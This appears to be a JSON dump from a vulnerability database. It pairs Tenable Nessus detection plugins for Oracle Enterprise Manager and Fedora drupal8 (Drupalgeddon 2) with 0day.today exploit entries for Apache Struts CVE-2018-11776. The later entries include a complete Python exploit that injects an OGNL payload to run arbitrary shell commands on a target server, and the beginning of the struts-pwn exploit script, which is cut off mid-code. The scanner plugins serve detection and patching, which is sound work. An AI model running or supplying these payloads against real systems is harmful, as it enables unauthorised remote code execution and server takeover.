script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by multiple vulnerabilities\");\n script_set_attribute(attribute:\"description\", value:\n\"The 13.3.0.0, 13.4.0.0, and 12.1.0.5 versions of Enterprise Manager Base Platform installed on the remote host are\naffected by multiple vulnerabilities as referenced in the July 2020 CPU advisory.\n\n - Vulnerability in the Enterprise Manager Base Platform\n product 
of Oracle Enterprise Manager (component:\n Enterprise Manager Install (jackson-databind)).\n Supported versions that are affected are 13.3.0.0 and\n 13.4.0.0. Easily exploitable vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 9.8 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2020-9546)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Reporting Framework (Apache Struts 2)). Supported\n versions that are affected are 13.3.0.0 and 13.4.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with network access via HTTP to\n compromise Enterprise Manager Base Platform. Successful\n attacks of this vulnerability can result in takeover of\n Enterprise Manager Base Platform. CVSS 3.1 Base Score\n 8.1 (Confidentiality, Integrity and Availability\n impacts). CVSS Vector:\n (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2018-11776)\n\n - Vulnerability in the Enterprise Manager Base Platform\n product of Oracle Enterprise Manager (component:\n Application Service Level Mgmt (Apache Axis)). Supported\n versions that are affected are 12.1.0.5 and 13.3.0.0.\n Difficult to exploit vulnerability allows\n unauthenticated attacker with access to the physical\n communication segment attached to the hardware where the\n Enterprise Manager Base Platform executes to compromise\n Enterprise Manager Base Platform. Successful attacks of\n this vulnerability can result in takeover of Enterprise\n Manager Base Platform. 
CVSS 3.1 Base Score 7.5\n (Confidentiality, Integrity and Availability impacts).\n CVSS Vector:\n (CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H).\n (CVE-2019-0227)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/a/tech/docs/cpujul2020cvrf.xml\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.oracle.com/security-alerts/cpujul2020.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the July 2020 Oracle Critical Patch Update advisory.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-11776\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2020-9546\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Apache Struts 2 Multiple Tags Result Namespace Handling RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache Struts 2 Namespace Redirect OGNL Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", 
value:\"2020/07/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:enterprise_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_enterprise_manager_installed.nbin\");\n script_require_keys(\"installed_sw/Oracle Enterprise Manager Cloud Control\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\n\napp_name = 'Oracle Enterprise Manager Cloud Control';\n\napp_info = vcf::get_app_info(app:app_name);\n\n# affected versions and patches \n# (mapping added in oracle_enterprise_manager_installed.nbin)\n#\n# 13.4.0\n# 31459685 -> 13.4.0.4\n#\n# 13.3.0.0\n# 31250768 -> 13.3.0.0.200714\n#\n# 12.1.0.5\n# 31250739 -> 12.1.0.5.200714\n \nconstraints = [\n { 'min_version' : '13.4.0.0', 'fixed_version' : '13.4.0.4', 'fixed_display': '13.4.0.4 (Patch 31459685)'},\n { 'min_version' : '13.3.0.0', 'fixed_version' : '13.3.0.0.200714', 'fixed_display': '13.3.0.0.200714 (Patch 31250768)'},\n { 'min_version' : '12.1.0.5', 'fixed_version' : '12.1.0.5.200714', 'fixed_display': '12.1.0.5.200714 (Patch 31250739)' }\n];\n \nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:53:59", "description": "- [8.3.9](https://www.drupal.org/project/drupal/releases/8 .3.9)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.3.8](https://www.drupal.org/project/drupal/releases/8 .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / 
CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2018-04-24T00:00:00", "type": "nessus", "title": "Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2018-922CC2FBAA.NASL", "href": "https://www.tenable.com/plugins/nessus/109288", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-922cc2fbaa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(109288);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-922cc2fbaa\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 26 : drupal8 (2018-922cc2fbaa) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.3.9](https://www.drupal.org/project/drupal/releases/8\n .3.9)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n 
[8.3.8](https://www.drupal.org/project/drupal/releases/8\n .3.8)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-922cc2fbaa\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.drupal.org/SA-CORE-2018-001\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/24\");\n 
script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/04/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"drupal8-8.3.9-1.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-08-30T15:58:53", "description": "- [8.4.6](https://www.drupal.org/project/drupal/releases/8 .4.6)\n\n - [SA-CORE-2018-002 (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002 )\n\n - [8.4.5](https://www.drupal.org/project/drupal/releases/8 .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 / CVE-2017-6930 / CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n - [8.4.4](https://www.drupal.org/project/drupal/releases/8 .4.4)\n\n - [8.4.3](https://www.drupal.org/project/drupal/releases/8 .4.3)\n\n - [8.4.2](https://www.drupal.org/project/drupal/releases/8 .4.2)\n\n - [8.4.1](https://www.drupal.org/project/drupal/releases/8 .4.1)\n\n - [8.4.0](https://www.drupal.org/project/drupal/releases/8 .4.0)\n\n - [8.4.0-rc2](https://www.drupal.org/project/drupal/releas es/8.4.0-rc2)\n\n - [8.4.0-rc1](https://www.drupal.org/project/drupal/releas es/8.4.0-rc1)\n\n - [8.4.0-beta1](https://www.drupal.org/project/drupal/rele ases/8.4.0-beta1)\n\n - [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system 
website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:drupal8", "cpe:/o:fedoraproject:fedora:28"], "id": "FEDORA_2018-906BA26B4D.NASL", "href": "https://www.tenable.com/plugins/nessus/120615", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-906ba26b4d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120615);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2017-6926\",\n \"CVE-2017-6927\",\n \"CVE-2017-6930\",\n \"CVE-2017-6931\",\n \"CVE-2018-7600\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-906ba26b4d\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"Fedora 28 : drupal8 (2018-906ba26b4d) (Drupalgeddon 2)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"-\n [8.4.6](https://www.drupal.org/project/drupal/releases/8\n .4.6)\n\n - [SA-CORE-2018-002\n (CVE-2018-7600)](https://www.drupal.org/SA-CORE-2018-002\n )\n\n -\n [8.4.5](https://www.drupal.org/project/drupal/releases/8\n .4.5)\n\n - [SA-CORE-2018-001 (CVE-2017-6926 / CVE-2017-6927 /\n CVE-2017-6930 /\n CVE-2017-6931)](https://www.drupal.org/SA-CORE-2018-001)\n\n -\n 
[8.4.4](https://www.drupal.org/project/drupal/releases/8\n .4.4)\n\n -\n [8.4.3](https://www.drupal.org/project/drupal/releases/8\n .4.3)\n\n -\n [8.4.2](https://www.drupal.org/project/drupal/releases/8\n .4.2)\n\n -\n [8.4.1](https://www.drupal.org/project/drupal/releases/8\n .4.1)\n\n -\n [8.4.0](https://www.drupal.org/project/drupal/releases/8\n .4.0)\n\n -\n [8.4.0-rc2](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc2)\n\n -\n [8.4.0-rc1](https://www.drupal.org/project/drupal/releas\n es/8.4.0-rc1)\n\n -\n [8.4.0-beta1](https://www.drupal.org/project/drupal/rele\n ases/8.4.0-beta1)\n\n -\n [8.4.0-alpha1](https://www.drupal.org/project/drupal/rel\n eases/8.4.0-alpha1)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-906ba26b4d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected drupal8 package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Drupal 8 SA-CORE-2018-002 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", 
value:'Drupal Drupalgeddon 2 Forms API Property Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/04/27\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:drupal8\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^28([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 28\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC28\", reference:\"drupal8-8.4.6-3.fc28\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"drupal8\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-08-28T02:33:40", "description": "Man Yue Mo from the Semmle Security Research team noticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible remote code execution vulnerabilities.", "cvss3": {}, "published": "2018-08-24T00:00:00", "type": "zdt", "title": "Apache Struts 2.x Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-24T00:00:00", "id": "1337DAY-ID-30956", "href": "https://0day.today/exploit/description/30956", "sourceData": "[CVEID]:CVE-2018-11776\r\n[PRODUCT]:Apache Struts\r\n[VERSION]:Apache Struts 2.3 to 2.3.34 and 2.5 to 2.5.16\r\n[PROBLEMTYPE]:Remote Code Execution\r\n[REFERENCES]:https://cwiki.apache.org/confluence/display/WW/S2-057\r\n[DESCRIPTION]:Man Yue Mo from the Semmle Security Research team\r\nnoticed that Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16\r\nsuffer from possible Remote Code Execution when using results with no\r\nnamespace and at the same time, its upper action(s) have no or wildcard\r\nnamespace. 
Same possibility when using url tag which doesn't have value\r\nand action set and at the same time, its upper action(s) have no or wildcard\r\nnamespace.\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30956", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:44", "description": "Exploit for multiple platforms in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (2) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30966", "href": "https://0day.today/exploit/description/30966", "sourceData": "#!/usr/bin/python\r\n# -*- coding: utf-8 -*-\r\n \r\n# hook-s3c (github.com/hook-s3c), @hook_s3c on twitter\r\n \r\nimport sys\r\nimport urllib\r\nimport urllib2\r\nimport httplib\r\n \r\n \r\ndef exploit(host,cmd):\r\n print \"[Execute]: {}\".format(cmd)\r\n \r\n ognl_payload = \"${\"\r\n ognl_payload += \"(#_memberAccess['allowStaticMethodAccess']=true).\"\r\n ognl_payload += \"(#cmd='{}').\".format(cmd)\r\n ognl_payload += \"(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).\"\r\n ognl_payload += \"(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).\"\r\n ognl_payload += \"(#p=new java.lang.ProcessBuilder(#cmds)).\"\r\n ognl_payload += \"(#p.redirectErrorStream(true)).\"\r\n ognl_payload += \"(#process=#p.start()).\"\r\n ognl_payload += \"(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).\"\r\n ognl_payload += \"(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).\"\r\n ognl_payload += \"(#ros.flush())\"\r\n ognl_payload += \"}\"\r\n \r\n if not \":\" in host:\r\n host = \"{}:8080\".format(host)\r\n \r\n # encode the payload\r\n ognl_payload_encoded = urllib.quote_plus(ognl_payload)\r\n \r\n # further encoding\r\n url = \"http://{}/{}/help.action\".format(host, 
ognl_payload_encoded.replace(\"+\",\"%20\").replace(\" \", \"%20\").replace(\"%2F\",\"/\"))\r\n \r\n print \"[Url]: {}\\n\\n\\n\".format(url)\r\n \r\n try:\r\n request = urllib2.Request(url)\r\n response = urllib2.urlopen(request).read()\r\n except httplib.IncompleteRead, e:\r\n response = e.partial\r\n print response\r\n \r\n \r\nif len(sys.argv) < 3:\r\n sys.exit('Usage: %s <host:port> <cmd>' % sys.argv[0])\r\nelse:\r\n exploit(sys.argv[1],sys.argv[2])\n\n# 0day.today [2018-08-28] #", "sourceHref": "https://0day.today/exploit/30966", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-28T02:33:52", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-08-28T00:00:00", "type": "zdt", "title": "Apache Struts 2.3 < 2.3.34 / 2.5 < 2.5.16 - Remote Code Execution (1) Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-11776"], "modified": "2018-08-28T00:00:00", "id": "1337DAY-ID-30965", "href": "https://0day.today/exploit/description/30965", "sourceData": "#!/usr/bin/env python3\r\n# coding=utf-8\r\n# *****************************************************\r\n# struts-pwn: Apache Struts CVE-2018-11776 Exploit\r\n# Author:\r\n# Mazin Ahmed <Mazin AT MazinAhmed DOT net>\r\n# This code uses a payload from:\r\n# https://github.com/jas502n/St2-057\r\n# *****************************************************\r\n \r\nimport argparse\r\nimport random\r\nimport requests\r\nimport sys\r\ntry:\r\n from urllib import parse as urlparse\r\nexcept ImportError:\r\n import urlparse\r\n \r\n# Disable SSL warnings\r\ntry:\r\n import requests.packages.urllib3\r\n requests.packages.urllib3.disable_warnings()\r\nexcept Exception:\r\n pass\r\n \r\nif len(sys.argv) <= 1:\r\n print('[*] CVE: 2018-11776 - Apache Struts2 S2-057')\r\n print('[*] Struts-PWN - @mazen160')\r\n print('\\n%s -h for help.' 
% (sys.argv[0]))\r\n exit(0)\r\n \r\n \r\nparser = argparse.ArgumentParser()\r\nparser.add_argument(\"-u\", \"--url\",\r\n dest=\"url\",\r\n help=\"Check a single URL.\",\r\n action='store')\r\nparser.add_argument(\"-l\", \"--list\",\r\n dest=\"usedlist\",\r\n help=\"Check a list of URLs.\",\r\n action='store')\r\nparser.add_argument(\"-c\", \"--cmd\",\r\n dest=\"cmd\",\r\n help=\"Command to execute. (Default: 'id')\",\r\n action='store',\r\n default='id')\r\nparser.add_argument(\"--exploit\",\r\n dest=\"do_exploit\",\r\n help=\"Exploit.\",\r\n action='store_true')\r\n \r\n \r\nargs = parser.parse_args()\r\nurl = args.url if args.url else None\r\nusedlist = args.usedlist if args.usedlist else None\r\ncmd = args.cmd if args.cmd else None\r\ndo_exploit = args.do_exploit if args.do_exploit else None\r\n \r\nheaders = {\r\n 'User-Agent': 'struts-pwn (https://github.com/mazen160/struts-pwn_CVE-2018-11776)',\r\n # 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36',\r\n 'Accept': '*/*'\r\n}\r\ntimeout = 3\r\n \r\n \r\ndef parse_url(url):\r\n \"\"\"\r\n Parses the URL.\r\n \"\"\"\r\n \r\n # url: http://example.com/demo/struts2-showcase/index.action\r\n \r\n url = url.replace('#', '%23')\r\n url = url.replace(' ', '%20')\r\n \r\n if ('://' not in url):\r\n url = str(\"http://\") + str(url)\r\n scheme = urlparse.urlparse(url).scheme\r\n \r\n # Site: http://example.com\r\n site = scheme + '://' + urlparse.urlparse(url).netloc\r\n \r\n # FilePath: /demo/struts2-showcase/index.action\r\n file_path = urlparse.urlparse(url).path\r\n if (file_path == ''):\r\n file_path = '/'\r\n \r\n # Filename: index.action\r\n try:\r\n filename = url.split('/')[-1]\r\n except IndexError:\r\n filename = ''\r\n \r\n # File Dir: /demo/struts2-showcase/\r\n file_dir = file_path.rstrip(filename)\r\n if (file_dir == ''):\r\n file_dir = '/'\r\n \r\n return({\"site\": site,\r\n \"file_dir\": file_dir,\r\n \"filename\": filename})\r\n \r\n 
\r\ndef build_injection_inputs(url):\r\n \"\"\"\r\n Builds injection inputs for the check.\r\n \"\"\"\r\n \r\n parsed_url = parse_url(url)\r\n injection_inputs = []\r\n url_directories = parsed_url[\"file_dir\"].split(\"/\")\r\n \r\n try:\r\n url_directories.remove(\"\")\r\n except ValueError:\r\n pass\r\n \r\n for i in range(len(url_directories)):\r\n injection_entry = \"/\".join(url_directories[:i])\r\n \r\n if not injection_entry.startswith(\"/\"):\r\n injection_entry = \"/%s\" % (injection_entry)\r\n \r\n if not injection_entry.endswith(\"/\"):\r\n injection_entry = \"%s/\" % (injection_entry)\r\n \r\n injection_entry += \"{{INJECTION_POINT}}/\" # It will be rendered later with the payload.\r\n injection_entry += parsed_url[\"filename\"]\r\n \r\n injection_inputs.append(injection_entry)\r\n \r\n return(injection_inputs)\r\n \r\n \r\ndef check(url):\r\n random_value = int(''.join(random.choice('0123456789') for i in range(2)))\r\n multiplication_value = random_value * random_value\r\n injection_points = build_injection_inputs(url)\r\n parsed_url = parse_url(url)\r\n print(\"[%] Checking for CVE-2018-11776\")\r\n print(\"[*] URL: %s\" % (url))\r\n print(\"[*] Total of Attempts: (%s)\" % (len(injection_points)))\r\n attempts_counter = 0\r\n \r\n for injection_point in injection_points:\r\n attempts_counter += 1\r\n print(\"[%s/%s]\" % (attempts_counter, len(injection_points)))\r\n testing_url = \"%s%s\" % (parsed_url[\"site\"], injection_point)\r\n testing_url = testing_url.replace(\"{{INJECTION_POINT}}\", \"${{%s*%s}}\" % (random_value, random_value))\r\n try:\r\n resp = requests.get(testing_url, headers=headers, verify=False, timeout=timeout, allow_redirects=False)\r\n except Exception as e:\r\n print(\"EXCEPTION::::--> \" + str(e))\r\n continue\r\n if \"Location\" in 